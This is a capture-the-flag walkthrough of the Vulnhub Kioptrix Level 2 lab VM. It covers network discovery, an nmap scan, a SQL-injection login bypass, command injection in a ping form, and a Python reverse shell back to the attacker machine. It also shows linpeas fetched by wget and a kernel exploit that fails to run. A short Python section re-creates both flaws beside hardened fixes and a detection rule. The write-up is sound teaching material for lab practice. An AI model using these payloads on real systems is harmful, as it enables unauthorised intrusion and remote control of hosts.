Vulnhub: Kioptrix Level 2 Target Machine, Detailed Testing Walkthrough
Kioptrix Level 2
Author: jason_huawen
Basic information about the target machine
Name: Kioptrix: Level 1.1 (#2)
Address: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Identifying the target host's IP address
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# netdiscover -i eth1
Currently scanning: 172.18.220.0/16 | Screen View: Unique Hosts
12 Captured ARP Req/Rep packets, from 4 hosts. Total size: 720
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 3 180 VMware, Inc.
192.168.187.132 00:0c:29:8a:42:50 2 120 VMware, Inc.
192.168.187.254 00:50:56:fe:ae:b9 4 240 VMware, Inc.
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.187.132.
NMAP scan
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# nmap -sS -sV -sC -p- 192.168.187.132 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 21:53 EST
Nmap scan report for bogon (192.168.187.132)
Host is up (0.00097s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 627/udp status
|_ 100024 1 630/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2022-12-05T00:21:11+00:00; -2h32m55s from scanner time.
630/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
3306/tcp open mysql MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8A:42:50 (VMware)
Host script results:
|_clock-skew: -2h32m55s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.48 seconds
Getting a shell
Visiting port 80 returns a login page, and it turns out the login is very easy to bypass:
Username: admin' or 1=1 --
Password: anything
After logging in there is a ping function; check whether it is vulnerable to command injection:
Input submitted in the form: ;which python
Returned: /usr/bin/python
Check whether Python can be used to establish a shell.
Submit the following in the input box:
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.187.130",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
On Kali Linux the reverse shell comes back successfully:
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.132] 32769
sh-3.00$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-3.00$ pwd
pwd
/var/www/html
sh-3.00$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 root root 4.0K Oct 8 2009 .
drwxr-xr-x 8 root root 4.0K Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1.7K Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
sh-3.00$
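The two flaws used above, the login bypass and the command injection in the ping form, both come from the same root cause: untrusted form input is pasted into a string that another interpreter (SQL, the shell) then parses. The following is an added example written for this page; it is not code from the original write-up or from the Kioptrix image. It re-creates each flaw in Python against an in-memory SQLite database and places the hardened version beside it. The table name, the stored credentials and the exact PHP logic being imitated are assumptions, since the target's index.php and pingit.php are not shown on the page; only the two payloads are taken from the write-up.

```python
"""Added example (not the page's or the project's own code): the login
bypass and ping-form command injection used in the write-up, re-created
in Python, each beside a hardened equivalent. Table name, credentials and
the imitated PHP logic are assumptions; only the payloads come from the
page."""
import ipaddress
import sqlite3

# Payloads quoted in the write-up.
LOGIN_BYPASS = "admin' or 1=1 --"
PING_INJECTION = ";which python"


def make_db():
    # Constructed sample data; the real user table is unknown.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return conn


def login_vulnerable(conn, username, password):
    # Query built by string concatenation. The quote in the username closes
    # the literal, "or 1=1" makes the WHERE clause true for every row, and
    # "--" comments out the password check that follows.
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, password):
    # Parameterised query: the values travel separately from the statement
    # text, so quotes and comment markers in the input stay plain data.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def ping_command_vulnerable(target):
    # Mirrors a shell string such as "ping -c 1 $target": the shell treats
    # ";" as a command separator, so whatever follows it runs as a second
    # command. Returns the string that would be handed to the shell; nothing
    # is executed here.
    return "ping -c 1 " + target


def ping_argv_hardened(target):
    # Allow-list validation plus no shell: the value must parse as an IPv4 or
    # IPv6 address literal, and the command is an argv list for subprocess,
    # so shell metacharacters have no meaning even if validation were skipped.
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError("ping target must be an IP address literal") from None
    return ["ping", "-c", "1", str(addr)]


def looks_like_injection(value):
    # Coarse detection rule for logging or alerting on form input: a quote
    # followed by an SQL keyword, an SQL comment marker, or any shell separator.
    lowered = value.lower()
    sql_markers = ("' or ", "'or ", " or 1=1", "--", "#", "/*")
    shell_markers = ";|&`$(){}\n"
    return (any(m in lowered for m in sql_markers)
            or any(c in value for c in shell_markers))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login accepts bypass:", login_vulnerable(db, LOGIN_BYPASS, "anything"))
    print("hardened login accepts bypass:  ", login_hardened(db, LOGIN_BYPASS, "anything"))
    print("vulnerable ping command line:", ping_command_vulnerable("127.0.0.1" + PING_INJECTION))
    try:
        ping_argv_hardened("127.0.0.1" + PING_INJECTION)
    except ValueError as err:
        print("hardened ping rejected input:", err)
    print("hardened ping argv:", ping_argv_hardened("192.168.187.132"))
    print("flagged by detector:", looks_like_injection(LOGIN_BYPASS), looks_like_injection(PING_INJECTION))
```

Two design points matter more than the specific checks. Parameterised queries fix the login bypass regardless of which quote or comment syntax the attacker uses, whereas filtering characters does not. For the ping form, passing an argv list to subprocess (never a shell string) removes the injection even before validation runs; the ipaddress check on top of that also rejects hostnames, which keeps the form from being turned into a DNS or SSRF probe. The looks_like_injection rule is intentionally crude and is meant for alerting on logged form input, not as a substitute for the two fixes.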
Privilege escalation
Upload the linpeas.sh script to the target host's /tmp directory, make it executable, and run it:
sh-3.00$ cd /tmp
cd /tmp
sh-3.00$ wget http://192.168.187.130:8000/linpeas.sh
wget http://192.168.187.130:8000/linpeas.sh
--19:41:39-- http://192.168.187.130:8000/linpeas.sh
=> `linpeas.sh.1'
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765,824 (748K) [text/x-sh]
100%[====================================>] 765,824 --.--K/s
19:41:39 (26.65 MB/s) - `linpeas.sh.1' saved [765824/765824]
sh-3.00$ chmod +x linpeas.sh
chmod +x linpeas.sh
sh-3.00$ ./linpeas.sh
./linpeas.sh
The script's output shows nothing exploitable.
However, the target host's kernel version is fairly old:
sh-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
sh-3.00$
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# searchsploit kernel 2.6.9
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Android Kernel < 4.8 - ptrace seccomp Filter Bypass | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service) | osx/dos/17901.c
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free | macos/local/40956.c
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation | macos/local/40957.c
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free | multiple/dos/40955.txt
DESlock+ < 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM | windows/local/5144.c
DESlock+ < 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC) | windows/dos/5142.c
DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak | windows/local/5141.c
DESlock+ < 3.2.6 - Local Kernel Ring0 link list zero SYSTEM | windows/local/5143.c
DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC) | windows/dos/6498.c
DESlock+ < 3.2.7 - Local Kernel Overflow (PoC) | windows/dos/6496.c
DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC) | windows/dos/6497.c
DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM | windows/local/16138.c
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation | windows/local/42625.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1) | windows/local/42624.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2) | windows/local/42665.py
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3) | linux/local/9844.py
Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service | linux/dos/686.c
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow | linux/dos/692.c
Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service | linux/dos/685.c
Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service | linux/dos/691.c
Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow | linux/dos/690.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit) | linux/local/19933.rb
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1) | linux/local/33321.c
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation | linux/local/1397.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) | linux/dos/31965.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) | linux/dos/31966.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation | linux_x86-64/local/33516.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation | linux/local/4756.c
Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure | linux/local/9363.c
Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service | linux/dos/1880.c
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3) | linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2) | linux/local/9574.txt
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak | linux/local/4172.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation | linux/local/6851.c
Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure | linux/local/7618.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation | linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation | linux/local/8369.sh
Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service | linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service | linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2) | linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1) | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2) | linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure | linux/local/15150.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation | linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2) | linux/dos/16952.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation | linux_x86-64/local/44302.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation | linux_x86-64/local/34134.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation | arm/local/31574.c
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation | linux_x86-64/local/44299.c
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2) | linux_x86-64/local/26131.c
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation | linux/local/25450.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c
macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics | multiple/dos/46300.c
OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow | bsd/local/125.c
Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC) | hardware/local/48644.c
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~/Vulnhub/Kioprtix2]
└─# searchsploit -m linux_x86/local/9542.c
Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/9542
Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
File Type: C source, ASCII text
Copied to: /root/Vulnhub/Kioprtix2/9542.c
Upload 9542.c to the target host.
Compilation complains:
sh-3.00$ gcc -o exploit 9542.c
gcc -o exploit 9542.c
9542.c:109:28: warning: no newline at end of file
After adding a blank line at the end of 9542.c it compiles, but running it still fails:
sh-3.00$ gcc -o exploit 9542.c
gcc -o exploit 9542.c
sh-3.00$ chmod +x exploit
chmod +x exploit
sh-3.00$ ./exploit
./exploit
[-] exploit failed, try again
sh-3.00$
This exploit is probably not very reliable, which is why the privilege escalation failed.
STRIVE FOR PROGRESS, NOT FOR PERFECTION